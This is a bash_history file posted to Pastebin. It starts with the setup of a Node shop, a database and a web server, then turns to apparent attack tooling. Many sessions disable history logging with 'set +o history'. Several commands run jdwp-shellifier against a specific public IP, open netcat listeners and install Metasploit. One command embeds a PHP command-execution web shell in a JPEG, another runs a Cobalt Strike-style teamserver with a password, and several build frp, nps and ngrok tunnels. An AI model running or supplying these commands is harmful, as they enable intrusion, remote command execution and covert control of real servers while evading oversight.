Advertisement
JohnGalt14

bash_history

Jan 17th, 2022 (edited)
379
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 43.74 KB | None | 1 0
  1.  
  2. #1620810877
  3. set +o history;
  4. #1620810892
  5. yum install update
  6. #1620810899
  7. yum install upgrade
  8. #1620810905
  9. yum update
  10. #1620811330
  11. yum upgrade
  12. #1620811346
  13. node -V
  14. #1620811359
  15. yum install nodejs
  16. #1620811382
  17. mysql -uroot -p
  18. #1620811393
  19. yum install mariadb
  20. #1620811508
  21. yum install mariadb-server
  22. #1620811528
  23. yum install mariadb-client
  24. #1620811542
  25. mysql_secure_installation
  26. #1620811560
  27. systemctl enable mariadb --now
  28. #1620811570
  29. systemctl start mariadb
  30. #1620811577
  31. mysql_secure_installation
  32. #1620811609
  33. mysql -uroot -p
  34. #1620811859
  35. git clone -b 2.0.0 http://git.btkj6.com/boss/ggb-shop.git
  36. #1620811864
  37. yum install git
  38. #1620811874
  39. git clone -b 2.0.0 http://git.btkj6.com/boss/ggb-shop.git
  40. #1620811910
  41. ls
  42. #1620811913
  43. cd ggb-shop/
  44. #1620811921
  45. npm install
  46. #1620811937
  47. cd app
  48. #1620811940
  49. npm install
  50. #1620811948
  51. cd ../pc
  52. #1620811952
  53. npm install
  54. #1620811970
  55. cd ../
  56. #1620812016
  57. node build.js all
  58. #1620812349
  59. node build.js cleardist
  60. #1620812403
  61. node build.js clear
  62. #1620812407
  63. node build.js server
  64. #1620812427
  65. node build.js admin
  66. #1620812442
  67. node build.js web
  68. #1620812459
  69. node build.js app
  70. #1620812476
  71. node build.js extend
  72. #1620812553
  73. cd dist/server
  74. #1620812612
  75. vi /etc/my.conf
  76. #1620812700
  77. vi /etc/my.cnf.d/mariadb-server.cnf
  78. #1620812751
  79. systemctl restart mariadb
  80. #1620812763
  81. mysql -uroot -p
  82. #1620812815
  83. ls
  84. #1620812830
  85. vi config.js
  86. #1620812848
  87. vi config.js
  88. #1620812871
  89. node init.js
  90. #1620812893
  91. node index.js 80
  92. #1620813020
  93. cd
  94. #1620813021
  95. ls
  96. #1620813023
  97. cd ggb-shop/
  98. #1620813024
  99. ls
  100. #1620813027
  101. cd pc
  102. #1620813027
  103. ls
  104. #1620813216
  105. cd ../
  106. #1620813217
  107. ls
  108. #1620813223
  109. node build.js web
  110. #1620813245
  111. cd dist/server
  112. #1620813249
  113. node index.js 80
  114. #1620813755
  115. npm install pm2 -g
  116. #1620813998
  117. pm2 start /root/ggb-shop/dist/server/index.js
  118. #1620814046
  119. pm2 save
  120. #1620814055
  121. pm2 startup
  122. #1620814063
  123. systemctl enable pm2-root
  124. #1620814069
  125. pm2 ls
  126. #1620818867
  127. w
  128. #1620818913
  129. pm2 ls
  130. #1620819486
  131. w
  132. #1620819536
  133. yum install caddy -y
  134. #1620819787
  135. dnf install 'dnf-command(copr)'
  136. #1620819810
  137. dnf copr enable @caddy/caddy
  138. #1620819848
  139. dnf install caddy
  140. #1620820078
  141. caddy
  142. #1620820141
  143. caddy help
  144. #1620820804
  145. service caddy status
  146. #1620820882
  147. service caddy status
  148. #1620820917
  149. caddy status
  150. #1620820923
  151. caddy
  152. #1620820957
  153. ls /etc
  154. #1620820977
  155. ls /etc/caddy
  156. #1620821097
  157. cat /etc/caddy/caddyfile
  158. #1620821117
  159. cat /etc/caddy/Caddyfile
  160. #1620821261
  161. systemctl enable caddy
  162. #1620821302
  163. Caddy service caddy start
  164. #1620821329
  165. service caddy start
  166. #1620821782
  167. vi /etc/caddy/Caddyfile
  168. #1620822212
  169. cat /etc/caddy/Caddyfile
  170. #1620822296
  171. vi /etc/caddy/Caddyfile
  172. #1620822454
  173. vi /etc/caddy/Caddyfile
  174. #1620822643
  175. vi /etc/caddy/Caddyfile
  176. #1620822971
  177. service caddy restart
  178. #1620824998
  179. service caddy restart
  180. #1620825080
  181. caddy adapt --config Caddyfile
  182. #1620825195
  183. service caddy restart
  184. #1620825242
  185. service caddy restart
  186. #1620825256
  187. service caddy stop
  188. #1620825259
  189. service caddy start
  190. #1620825369
  191. caddy reload
  192. #1620825460
  193. service caddy restart
  194. #1620825487
  195. service caddy restart
  196. #1620825495
  197. service caddy stop
  198. #1620825498
  199. service caddy start
  200. #1620825528
  201. service caddy status
  202. #1620825545
  203. ls /usr/local/caddy/
  204. #1620825604
  205. service caddy stop
  206. #1620825607
  207. service caddy status
  208. #1620825618
  209. service caddy start
  210. #1620825697
  211. service caddy start
  212. #1620825756
  213. systemctl reload caddy
  214. #1620825768
  215. systemctl status caddy
  216. #1620825791
  217. systemctl start caddy
  218. #1620825803
  219. systemctl start caddy
  220. #1620825846
  221. systemctl start caddy
  222. #1620825917
  223. systemctl reload caddy
  224. #1620826018
  225. systemctl reload caddy
  226. #1620826048
  227. systemctl reload caddy
  228. #1620826096
  229. systemctl reload caddy
  230. #1620826103
  231. systemctl reload caddy
  232. #1620826117
  233. systemctl reload caddy
  234. #1620826215
  235. systemctl reload caddy
  236. #1620826490
  237. systemctl reload caddy
  238. #1620826493
  239. systemctl reload caddy
  240. #1620826624
  241. systemctl reload caddy
  242. #1620826698
  243. systemctl reload caddy
  244. #1620826742
  245. curl http://localhost:7000
  246. #1620826749
  247. curl http://localhost:7000/web
  248. #1620826815
  249. systemctl reload caddy
  250. #1620827278
  251. systemctl reload caddy
  252. #1620827390
  253. dnf uninstall caddy
  254. #1620827446
  255. dnf remove caddy
  256. #1620827558
  257. yum install nginx
  258. #1620827582
  259. systemctl enable nginx
  260. #1620827587
  261. systemctl start nginx
  262. #1620827592
  263. systemctl status nginx
  264. #1620827706
  265. ls /etc
  266. #1620827725
  267. ls /etc/nginx
  268. #1620827756
  269. ls /etc/nginx/conf.d/
  270. #1620827784
  271. touch /etc/nginx/conf.d/ggbggb.com.conf
  272. #1620828168
  273. systemctl restart nginx
  274. #1620828377
  275. systemctl restart nginx
  276. #1620832072
  277. yum uninstall nginx
  278. #1620832086
  279. yum remove nginx
  280. #1620832127
  281. yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh
  282. #1620832550
  283. yum remove mariadb
  284. #1620832876
  285. ls
  286. #1620832882
  287. node init.js
  288. #1620832896
  289. node init.js
  290. #1620833564
  291. pm2
  292. #1620833575
  293. pm2 -h
  294. #1620833615
  295. pm2 ls
  296. #1620833624
  297. pm2 stop 0
  298. #1620833630
  299. ls
  300. #1620833637
  301. node index.js
  302. #1620833677
  303. node index.js 80
  304. #1620833686
  305. pm2 ls
  306. #1620833691
  307. pm2 start 0
  308. #1620834296
  309. /etc/init.d/bt default
  310. #1620861306
  311. ls
  312. #1620861306
  313. set +o history;
  314. #1620861308
  315. cd ggb-shop/
  316. #1620861309
  317. ls
  318. #1620861322
  319. node build.js web
  320. #1620861377
  321. node build.js web
  322. #1620861594
  323. node build.js web
  324. #1620861912
  325. node build.js web
  326. #1620861982
  327. node build.js web
  328. #1620862208
  329. node build.js web
  330. #1620862838
  331. node build.js web
  332. #1620862951
  333. node build.js web
  334. #1620863000
  335. node build.js web
  336. #1620863633
  337. node build.js web
  338. #1620863704
  339. node build.js web
  340. #1620863772
  341. node build.js web
  342. #1620869239
  343. node build.js web
  344. #1620869311
  345. node build.js web
  346. #1620869620
  347. node build.js web
  348. #1620869721
  349. node build.js web
  350. #1620871371
  351. node build.js app
  352. #1620872117
  353. node build.js app
  354. #1620872173
  355. node build.js app
  356. #1620872257
  357. node build.js app
  358. #1620872284
  359. node build.js app
  360. #1620872345
  361. node build.js app
  362. #1620872442
  363. node build.js web
  364. #1620872558
  365. node build.js web
  366. #1620872600
  367. node build.js web
  368. #1620872638
  369. node build.js app
  370. #1620872690
  371. node build.js app
  372. #1620995416
  373. w
  374. #1620995417
  375. set +o history;
  376. #1620995420
  377. pm2 ls
  378. #1620995426
  379. pm2 stop 0
  380. #1620995428
  381. ls
  382. #1620995430
  383. cd ggb-shop/
  384. #1620995433
  385. cd dist/server
  386. #1620995434
  387. ls
  388. #1620995439
  389. node index.js
  390. #1620999679
  391. ls
  392. #1620999680
  393. cd
  394. #1620999681
  395. ls
  396. #1620999683
  397. cd ggb-shop/
  398. #1620999683
  399. ls
  400. #1620999690
  401. node build.js app
  402. #1620999708
  403. cd dist/server
  404. #1620999711
  405. node index.js
  406. #1620999921
  407. pm2 start 0
  408. #1621000150
  409. reboot
  410. #1624584477
  411. ls
  412. #1624584478
  413. bt
  414. #1624585047
  415. ls
  416. #1624585050
  417. cd /www
  418. #1624585051
  419. ls
  420. #1624585058
  421. cd /wwwroot
  422. #1624585063
  423. cd wwwroot
  424. #1624585065
  425. ls
  426. #1624585068
  427. cd pro.cloudreve.org/
  428. #1624585069
  429. ls
  430. #1624585073
  431. cd v3
  432. #1624585074
  433. ls
  434. #1624585086
  435. chmod 777 prosign
  436. #1624585096
  437. nohup ./prosign &
  438. #1624585924
  439. cd ../
  440. #1624585966
  441. grep -r -l "changeRoot" /www/wwwroot/pro,cloudreve.org
  442. #1624586023
  443. grep -r -l changeRoot /www/wwwroot/pro,cloudreve.org
  444. #1624586025
  445. /grep -r -l changeRoot /www/wwwroot/pro,cloudreve.org
  446. #1624586031
  447. grep -r -l changeRoot /www/wwwroot/pro,cloudreve.org/
  448. #1624586039
  449. pwd
  450. #1624586069
  451. grep -r -l changeRoot /www/wwwroot/pro,cloudreve.org/*
  452. #1624586076
  453. grep -R -l changeRoot /www/wwwroot/pro,cloudreve.org/*
  454. #1624586099
  455. grep -Rw -l changeRoot /www/wwwroot/pro,cloudreve.org/*
  456. #1624586105
  457. grep -Rw changeRoot /www/wwwroot/pro,cloudreve.org/*
  458. #1624586148
  459. find . -name "*.php" | xargs grep "changeRoot"
  460. #1624588146
  461. exit
  462. #1624588260
  463. cd /www/wwwreoot
  464. #1624588267
  465. cd /www/wwwroot
  466. #1624588268
  467. ls
  468. #1624588270
  469. cd pro.cloudreve.org/
  470. #1624588271
  471. ls
  472. #1624588274
  473. cd v3
  474. #1624588275
  475. ls
  476. #1624588760
  477. ./cloudreve
  478. #1624588793
  479. ./cloudreve
  480. #1624589131
  481. ./cloudreve
  482. #1624589156
  483. ./cloudreve
  484. #1624590677
  485. exit
  486. #1625797087
  487. nc
  488. #1625797105
  489. nc -vv -l -p 4451
  490. #1625797163
  491. bt
  492. #1625797248
  493. nc -vv -l -p 4451
  494. #1625834082
  495. ls
  496. #1625834085
  497. exit
  498. #1626019977
  499. bt
  500. #1626021052
  501. mysql
  502. #1626021078
  503. mysql -u root -p
  504. #1626023133
  505. exit
  506. #1626458686
  507. id
  508. #1626458689
  509. ls
  510. #1626458694
  511. exit
  512. #1627950025
  513. set +o history;
  514. #1627950023
  515. bt
  516. #1629189144
  517. set +o history;
  518. #1629189192
  519. ls
  520. #1629189195
  521. wget https://raw.githubusercontent.com/IOActive/jdwp-shellifier/master/jdwp-shellifier.py
  522. #1629189197
  523. ls
  524. #1629189221
  525. phon jdwp-shellifier.py -t 124.71.101.66 -p 8000
  526. #1629189227
  527. python jdwp-shellifier.py -t 124.71.101.66 -p 8000
  528. #1629189233
  529. python3 jdwp-shellifier.py -t 124.71.101.66 -p 8000
  530. #1629189238
  531. python2 jdwp-shellifier.py -t 124.71.101.66 -p 8000
  532. #1629190881
  533. bt
  534. #1629190945
  535. nc -vv -l -p 4451
  536. #1629198295
  537. exit
  538. #1629198293
  539. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  540. #1629323746
  541. curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
  542. #1629323762
  543. chmod +x msfinstall
  544. #1629323776
  545. ./msfinstall
  546. #1629323854
  547. msfconsole
  548. #1629323982
  549. msfconsole
  550. #1629324072
  551. ls
  552. #1629324077
  553. exit
  554. #1629326595
  555. set +o history;
  556. #1629326598
  557. ps
  558. #1629326604
  559. bt
  560. #1629326760
  561. msfconsole
  562. #1629334932
  563. set +o history;
  564. #1629334934
  565. msfconsole
  566. #1629342734
  567. msfconsole
  568. #1629342731
  569. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  570. #1629364593
  571. set +o history;
  572. #1629364593
  573. msfconsole
  574. #1629599647
  575. set +o history;
  576. #1629599656
  577. bt
  578. #1629625434
  579. set +o history;
  580. #1629625435
  581. exit
  582. #1631337986
  583. set +o history;
  584. #1631338026
  585. set +o history;
  586. #1632928886
  587. set +o history;
  588. #1632928886
  589. bt
  590. #1632955381
  591. exit
  592. #1633932777
  593. set +o history;
  594. #1633932777
  595. bt
  596. #1633946037
  597. exit
  598. #1634864385
  599. set +o history;
  600. #1634864385
  601. bt
  602. #1635307783
  603. ls
  604. #1635307783
  605. set +o history;
  606. #1635307785
  607. bt
  608. #1635307829
  609. ls
  610. #1635338337
  611. cd /www
  612. #1635338342
  613. cd wwwroot
  614. #1635338351
  615. cd pro.cloudreve.org/
  616. #1635338352
  617. ls
  618. #1635338356
  619. cd v3
  620. #1635338363
  621. ./prosign
  622. #1635376576
  623. ./prosign &
  624. #1635376717
  625. ps
  626. #1635377279
  627. pkill -9 790230
  628. #1635377280
  629. ps
  630. #1635377311
  631. pkill -9 prosign
  632. #1635377313
  633. ps
  634. #1635753674
  635. set +o history;
  636. #1635753697
  637. git clone https://github.com/dlegs/php-jpeg-injector.git
  638. #1635753700
  639. ls
  640. #1635753703
  641. cd php-jpeg-injector/
  642. #1635753704
  643. ls
  644. #1635753746
  645. python3 gd-jpeg.py cat.jpg '<?php system($_GET["cmd"]);?>' infected_cat.jpg
  646. #1635753786
  647. python gd-jpeg.py cat.jpg ‘<?php phpinfo()?>’ cat.jpg
  648. #1635753795
  649. python3 gd-jpeg.py cat.jpg ‘<?php phpinfo()?>’ cat.jpg
  650. #1635753814
  651. python3 gd-jpeg.py cat.jpg ‘<?php phpinfo();?>’ cat.jpg
  652. #1635753859
  653. python3 gd-jpeg.py cat.jpg '<?php phpinfo();?>' cat.jpg
  654. #1635753943
  655. python2 demo.py bb.gif '<?phpinfo();?>' 2.gif
  656. #1635753949
  657. python demo.py bb.gif '<?phpinfo();?>' 2.gif
  658. #1635753959
  659. python3 demo.py bb.gif '<?phpinfo();?>' 2.gif
  660. #1635754044
  661. python demo.py
  662. #1635754059
  663. python demo.py bb.gif '1' 22.gif
  664. #1635754341
  665. php
  666. #1635754414
  667. php.php cat.jpg 212.jpg
  668. #1635754420
  669. yum install php
  670. #1635754740
  671. python3 gd-jpeg.py cat.gif '<?php phpinfo();?>' cat2.gif
  672. #1635769801
  673. python3 gd-jpeg.py cat.gif '<?php phpinfo();?>' cat2.gif
  674. #1635769806
  675. exit
  676. #1636068048
  677. set +o history;
  678. #1636068066
  679. ls
  680. #1636068075
  681. unzip CSAgent.zip
  682. #1636068078
  683. ls
  684. #1636068115
  685. ./teamserver 43.129.223.220 2233262
  686. #1636068129
  687. chmod +x teamserver
  688. #1636068133
  689. ./teamserver 43.129.223.220 2233262
  690. #1636068142
  691. yum install java
  692. #1636068173
  693. java
  694. #1636068206
  695. java --version
  696. #1636068221
  697. yum -y install java-1.8.0-openjdk*
  698. #1636068296
  699. rm -f /var/lib/rpm/__db*
  700. #1636068306
  701. rpm --rebuilddb
  702. #1636068316
  703. yum -y update
  704. #1636069755
  705. yum -y install java-1.8.0-openjdk*
  706. #1636070377
  707. ./teamserver 43.129.223.220 2233262
  708. #1636070627
  709. ./teamserver 43.129.223.220 2233262
  710. #1636073032
  711. cls
  712. #1636073035
  713. clear
  714. #1636073043
  715. ./teamserver 43.129.223.220 2233262 ./me.profile
  716. #1636074001
  717. ./teamserver 43.129.223.220 2233262
  718. #1636097801
  719. wget https://github.com/fatedier/frp/releases/download/v0.38.0/frp_0.38.0_linux_amd64.tar.gz
  720. #1636097832
  721. tar zxf frp_0.38.0_linux_amd64.tar.gz
  722. #1636097836
  723. ls
  724. #1636097839
  725. cd frp_0.38.0_linux_amd64/
  726. #1636097846
  727. vi frps.ini
  728. #1636097926
  729. ./frps -c frps.ini
  730. #1636098101
  731. vi frps.ini
  732. #1636098115
  733. ./frps -c frps.ini
  734. #1636099145
  735. cd
  736. #1636099146
  737. ls
  738. #1636099617
  739. msfconsole
  740. #1636101252
  741. ./teamserver 43.129.223.220 2233262
  742. #1636152506
  743. exit
  744. #1636636432
  745. set +o history;
  746. #1636636433
  747. ls
  748. #1636636438
  749. ps
  750. #1636636459
  751. wget -N --no-check-certificate git.io/f.sh && chmod +x f.sh && bash f.sh install
  752. #1636636729
  753. bash f.sh dashboard_port
  754. #1636636959
  755. bash f.sh uninstall
  756. #1636637011
  757. ls
  758. #1636637019
  759. rm -rf f.sh
  760. #1636637022
  761. ls
  762. #1636637025
  763. wget -N --no-check-certificate https://raw.githubusercontent.com/335622119/btp_frps/master/install.sh && chmod +x f.sh && bash f.sh
  764. #1636637035
  765. install.sh
  766. #1636637045
  767. ./install.sh
  768. #1636637054
  769. chmod +x install.sh
  770. #1636637055
  771. ./install.sh
  772. #1636637069
  773. ./install.sh install
  774. #1636637076
  775. ./install.sh download
  776. #1636637105
  777. git clone https://github.com/335622119/btp_frps.git
  778. #1636637109
  779. ls
  780. #1636637114
  781. cd btp_frps/
  782. #1636637115
  783. ls
  784. #1636637126
  785. ./install.sh install
  786. #1636637132
  787. chmod +x install.sh
  788. #1636637135
  789. ./install.sh
  790. #1636637138
  791. ./install.sh install
  792. #1636637312
  793. cd
  794. #1636637313
  795. wget -O - https://raw.githubusercontent.com/Zo3i/OCS/master/docker/docker-all2.sh | sh
  796. #1636637426
  797. ls
  798. #1636637430
  799. cd btp_frps/
  800. #1636637442
  801. ls
  802. #1636637449
  803. ./install.sh
  804. #1636637462
  805. ./install.sh download
  806. #1636637466
  807. ./install.sh install
  808. #1636637523
  809. ps
  810. #1636637584
  811. wget -N --no-check-certificate git.io/f.sh && chmod +x f.sh && bash f.sh install
  812. #1636637595
  813. ps
  814. #1636637685
  815. systemctl start frps
  816. #1636637771
  817. ps
  818. #1636637780
  819. f.sh uninstall
  820. #1636637795
  821. ls
  822. #1636637802
  823. bash install.sh
  824. #1636637805
  825. bash install.sh download
  826. #1636637813
  827. bash f.sh unistall
  828. #1636637820
  829. bash f.sh uninstall
  830. #1636638542
  831. ps
  832. #1636638552
  833. cd
  834. #1636638553
  835. ls
  836. #1636638733
  837. wget https://raw.githubusercontent.com/MvsCode/frps-onekey/master/install-frps.sh -O ./install-frps.sh
  838. #1636638738
  839. chmod 700 ./install-frps.sh
  840. #1636638742
  841. ./install-frps.sh install
  842. #1636897552
  843. set +o history;
  844. #1636897623
  845. wget -O https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz
  846. #1636897627
  847. wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz
  848. #1636897631
  849. ls
  850. #1636897678
  851. tar -xzvf linux_amd64_server.tar.gz
  852. #1636897680
  853. ls
  854. #1636897686
  855. cd nps
  856. #1636897686
  857. ls
  858. #1636897702
  859. ./nps install
  860. #1636897718
  861. nps start
  862. #1636897940
  863. ls /etc/nps
  864. #1636897945
  865. ls /etc/nps/conf
  866. #1636897960
  867. cat /etc/nps/conf/nps.conf
  868. #1636898323
  869. nps reload
  870. #1636898327
  871. nps
  872. #1636898373
  873. vi /etc/nps/conf/nps.conf
  874. #1636898387
  875. nps stop
  876. #1636898389
  877. nps
  878. #1636898396
  879. nps stop
  880. #1636898398
  881. vi /etc/nps/conf/nps.conf
  882. #1636898419
  883. nps
  884. #1636899516
  885. npc stop
  886. #1636899520
  887. nps stop
  888. #1636899599
  889. nps uninstall
  890. #1636900264
  891. nps
  892. #1636900276
  893. ./nps uninstall
  894. #1636900285
  895. nps stop
  896. #1636900291
  897. ./nps uninstall
  898. #1636900293
  899. nps
  900. #1636900326
  901. nps restart
  902. #1636900329
  903. ps
  904. #1636900361
  905. nps stop
  906. #1636901154
  907. nps stop
  908. #1636901158
  909. reboot
  910. #1636901218
  911. set +o history;
  912. #1636901222
  913. nps uninstall
  914. #1636901228
  915. nps stop
  916. #1636901232
  917. ./nps stop
  918. #1636901234
  919. ps
  920. #1636901241
  921. wget http://121.42.171.79:9100/ngrok/server/linux_amd64.zip
  922. #1636901259
  923. unzip linux_amd64.zip
  924. #1636901263
  925. ls
  926. #1636901296
  927. cd linux_amd64/
  928. #1636901297
  929. ls
  930. #1636901329
  931. ./ngrokd --domain="ngrok.ggbggb.com"
  932. #1636901347
  933. cd
  934. #1636901351
  935. nps install
  936. #1636901358
  937. nps uninstall
  938. #1636901363
  939. nps uninstall
  940. #1636901378
  941. ccd /etc/nps
  942. #1636901381
  943. cd /etc/nps
  944. #1636901383
  945. ls
  946. #1636901385
  947. cd conf
  948. #1636901386
  949. ls
  950. #1636901392
  951. cat nps.conf
  952. #1636901421
  953. cd
  954. #1636901422
  955. wget --no-check-certificate https://github.com/clangcn/ngrok-one-key-install/raw/master/install_ngrok.sh -O ./install_ngrok.sh
  956. #1636901428
  957. chmod 500 ./install_ngrok.sh
  958. #1636901433
  959. ./install_ngrok.sh install
  960. #1636901548
  961. ls
  962. #1636901663
  963. /etc/init.d/ngrokd confi
  964. #1636901671
  965. /etc/init.d/ngrokd config
  966. #1636901696
  967. /etc/init.d/ngrokd restart
  968. #1636901728
  969. /etc/init.d/ngrokd status
  970. #1636901740
  971. /etc/init.d/ngrokd userlist
  972. #1636902822
  973. ./install_ngrok.sh install
  974. #1636902828
  975. ./install_ngrok.sh uninstall
  976. #1636902841
  977. ./install_ngrok.sh install
  978. #1636902943
  979. /etc/init.d/ngrokd adduser
  980. #1636903505
  981. /etc/init.d/ngrokd restart
  982. #1636904727
  983. /etc/init.d/ngrokd stop
  984. #1636904731
  985. ./install_ngrok.sh uninstall
  986. #1636904755
  987. git clone
  988. #1636904759
  989. git clone https://github.com/panyongwei/ngrok.git
  990. #1636904762
  991. ls
  992. #1636904771
  993. cd ngrok
  994. #1636904772
  995. ls
  996. #1636904781
  997. chmod +x ngrok.sh
  998. #1636904786
  999. ./ngrok.sh
  1000. #1636905036
  1001. ./ngrok.sh
  1002. #1636905072
  1003. yum install gcc -y
  1004. #1636905084
  1005. cd
  1006. #1636905093
  1007. go version
  1008. #1636905105
  1009. yum install -y mercurial git bzr subversion golang golang-pkg-windows-amd64 golang-pkg-windows-386
  1010. #1636905135
  1011. yum install -y mercurial git bzr subversion golang golang-pkg-windows-amd64
  1012. #1636905237
  1013. ls
  1014. #1636905370
  1015. ./install_ngrok.sh install
  1016. #1636905625
  1017. /etc/init.d/ngrokd restart
  1018. #1636905629
  1019. /etc/init.d/ngrokd info
  1020. #1636905915
  1021. /etc/init.d/ngrokd stop
  1022. #1636905918
  1023. ps
  1024. #1636905978
  1025. cd /usr/local/ngrok
  1026. #1636905980
  1027. cd bin
  1028. #1636905987
  1029. ./ngrokd -tlsKey="../server.key" -tlsCrt="../server.crt" -domain="ngrok.ggbggb.com" -httpAddr=":8080" -httpsAddr=":4433"
  1030. #1636906024
  1031. ./install_ngrok.sh uninstall
  1032. #1636906027
  1033. cd
  1034. #1636906028
  1035. ./install_ngrok.sh uninstall
  1036. #1636906079
  1037. cd /usr/local
  1038. #1636906086
  1039. wget http://www.golangtc.com/static/go/1.4.2/go1.4.2.linux-amd64.tar.gz
  1040. #1636906222
  1041. wget http://www.golangtc.com/static/go/1.4.2/go1.4.2.linux-amd64.tar.gz
  1042. #1636906259
  1043. wget https://dl.google.com/go/go1.17.3.linux-amd64.tar.gz
  1044. #1636906284
  1045. tar -zxvf go1.17.3.linux-amd64.tar.gz
  1046. #1636906304
  1047. ln -s /usr/local/go/bin/* /usr/bin/
  1048. #1636906314
  1049. go version
  1050. #1636906327
  1051. git clone https://github.com/inconshreveable/ngrok.git
  1052. #1636906334
  1053. ls
  1054. #1636906349
  1055. cd /usr/local
  1056. #1636906351
  1057. ls
  1058. #1636906355
  1059. wget https://dl.google.com/go/go1.17.3.linux-amd64.tar.gz
  1060. #1636906372
  1061. tar -zxvf go1.17.3.linux-amd64.tar.gz
  1062. #1636906389
  1063. ln -s /usr/local/go/bin/* /usr/bin/
  1064. #1636906395
  1065. go version
  1066. #1636906402
  1067. git clone https://github.com/inconshreveable/ngrok.git
  1068. #1636906412
  1069. export GOPATH=/usr/local/ngrok/
  1070. #1636906427
  1071. export NGROK_DOMAIN="ngrok.ggbggb.com"
  1072. #1636906432
  1073. cd ngrok
  1074. #1636906454
  1075. openssl genrsa -out rootCA.key 2048
  1076. #1636906460
  1077. openssl req -x509 -new -nodes -key rootCA.key -subj "/CN=$NGROK_DOMAIN" -days 5000 -out rootCA.pem
  1078. #1636906465
  1079. openssl genrsa -out server.key 2048
  1080. #1636906471
  1081. openssl req -new -key server.key -subj "/CN=$NGROK_DOMAIN" -out server.csr
  1082. #1636906480
  1083. openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 5000
  1084. #1636906493
  1085. cp rootCA.pem assets/client/tls/ngrokroot.crt
  1086. #1636906506
  1087. cp rootCA.pem assets/client/tls/ngrokroot.crt
  1088. #1636906509
  1089. cp server.crt assets/server/tls/snakeoil.crt
  1090. #1636906520
  1091. cp server.key assets/server/tls/snakeoil.key
  1092. #1636906552
  1093. cd /usr/local/go/src
  1094. #1636906559
  1095. GOOS=linux GOARCH=amd64 ./make.bash
  1096. #1636906572
  1097. cd /usr/local/ngrok/
  1098. #1636906577
  1099. GOOS=linux GOARCH=amd64 make release-server
  1100. #1636906632
  1101. yum search ngrok
  1102. #1636906758
  1103. GOOS=linux GOARCH=amd64 make release-server
  1104. #1636906795
  1105. make
  1106. #1636906815
  1107. make release-server
  1108. #1636906824
  1109. make server
  1110. #1636906930
  1111. vi /usr/local/ngrok/src/ngrok/log/logger.go
  1112. #1636906990
  1113. export GOPATH=/go
  1114. #1636906994
  1115. export CGO_ENABLED=0
  1116. #1636906999
  1117. export GOOS=linux GOARCH=386
  1118. #1636907004
  1119. make release-server release-client
  1120. #1636907013
  1121. export GOOS=linux GOARCH=amd64
  1122. #1636907018
  1123. make release-server release-client
  1124. #1636907066
  1125. cd /usr/local/go/src
  1126. #1636907072
  1127. GOOS=linux GOARCH=amd64 ./make.bash
  1128. #1636907167
  1129. cd /usr/local
  1130. #1636907202
  1131. wget https://dl.google.com/go/go1.4.2.linux-amd64.tar.gz
  1132. #1636907213
  1133. tar -zxvf go1.4.2.linux-amd64.tar.gz
  1134. #1636907220
  1135. ln -s /usr/local/go/bin/* /usr/bin/
  1136. #1636907229
  1137. export GOPATH=/usr/local/ngrok/
  1138. #1636907243
  1139. export NGROK_DOMAIN="ngrok.ggbggb.com"
  1140. #1636907249
  1141. cd ngrok
  1142. #1636907257
  1143. cd /usr/local/go/src
  1144. #1636907261
  1145. GOOS=linux GOARCH=amd64 ./make.bash
  1146. #1636907290
  1147. cd /usr/local/ngrok/
  1148. #1636907294
  1149. GOOS=linux GOARCH=amd64 make release-server
  1150. #1636907306
  1151. yum search go
  1152. #1636907352
  1153. yum search golang
  1154. #1636907393
  1155. cd /usr/local/go/src
  1156. #1636907396
  1157. GOOS=linux GOARCH=amd64 ./make.bash
  1158. #1636907505
  1159. go version
  1160. #1636907779
  1161. curl -L https://github.com/snail007/goproxy/blob/master/install_auto.sh | bash
  1162. #1636907786
  1163. cd
  1164. #1636907794
  1165. curl -L https://github.com/snail007/goproxy/blob/master/install_auto.sh | bash
  1166. #1636907806
  1167. wget https://github.com/snail007/goproxy/blob/master/install_auto.sh
  1168. #1636907808
  1169. ls
  1170. #1636907847
  1171. ./install_auto.sh
  1172. #1636907859
  1173. chmod +x ./install_auto.sh
  1174. #1636907861
  1175. ./install_auto.sh
  1176. #1636907908
  1177. wget https://raw.githubusercontent.com/snail007/goproxy/master/install_auto.sh
  1178. #1636907912
  1179. chmod +x ./install_auto.sh
  1180. #1636907914
  1181. ./install_auto.sh
  1182. #1636908229
  1183. proxy keygen -C proxy
  1184. #1636908243
  1185. proxy keygen -s -C proxy -c goproxy
  1186. #1636908340
  1187. ls
  1188. #1636908504
  1189. proxy bridge -p ":4040" -C proxy.crt -K proxy.key
  1190. #1636908547
  1191. proxy bridge -p ":4040" -C proxy.crt -K proxy.key --daemon
  1192. #1636908556
  1193. proxy server -r ":10090@:10090" -P "127.0.0.1:4040" -C proxy.crt -K proxy.key
  1194. #1636908878
  1195. rm /usr/bin/proxy && rm -rf /etc/proxy
  1196. #1636906208
  1197. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1198. #1637023762
  1199. ls
  1200. #1637023763
  1201. set +o history;
  1202. #1637023780
  1203. install_fros.sh
  1204. #1637023794
  1205. ./install_frps.sh
  1206. #1637023798
  1207. install_frps.sh
  1208. #1637023805
  1209. install-frps.sh
  1210. #1637023809
  1211. ls
  1212. #1637023827
  1213. install_auto.sh
  1214. #1637023833
  1215. ./install_auto.sh
  1216. #1637023850
  1217. rm /usr/bin/proxy && rm -rf /etc/proxy
  1218. #1637023862
  1219. ./install-frps.sh
  1220. #1637023870
  1221. ./install-frps.sh install
  1222. #1637023923
  1223. ./install-frps.sh uninstall
  1224. #1637023940
  1225. f.sh
  1226. #1637023944
  1227. ./f.sh
  1228. #1637023946
  1229. ls
  1230. #1637024304
  1231. ./install-frps.sh install
  1232. #1637024435
  1233. ./install-frps.sh install
  1234. #1637034286
  1235. w
  1236. #1637034288
  1237. exit
  1238. #1637167544
  1239. set +o history;
  1240. #1637167623
  1241. exit
  1242. #1637167719
  1243. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1244. #1637201570
  1245. set +o history;
  1246. #1637201578
  1247. yum install nmap
  1248. #1637201628
